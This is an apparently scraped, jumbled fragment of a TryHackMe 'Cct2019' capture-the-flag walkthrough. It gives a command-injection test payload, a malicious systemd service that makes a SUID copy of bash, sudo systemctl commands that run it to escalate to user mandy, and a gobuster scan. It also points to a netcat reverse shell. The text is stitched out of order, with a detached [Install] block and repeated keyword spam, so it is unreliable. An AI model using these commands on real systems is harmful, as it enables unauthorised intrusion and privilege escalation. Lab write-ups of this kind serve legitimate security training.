Cct2019 Tryhackme -

127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner.

[Unit] Description=Privilege escalation [Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' cct2019 tryhackme

sudo -u mandy /bin/systemctl link /home/www-data/privesc.service sudo -u mandy /bin/systemctl start privesc.service Now /tmp/bash is a SUID binary. /tmp/bash -p Now you are mandy . cct2019 tryhackme

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or cct2019 tryhackme

[Install] WantedBy=multi-user.target

Report Errors • Advertise on myDorpie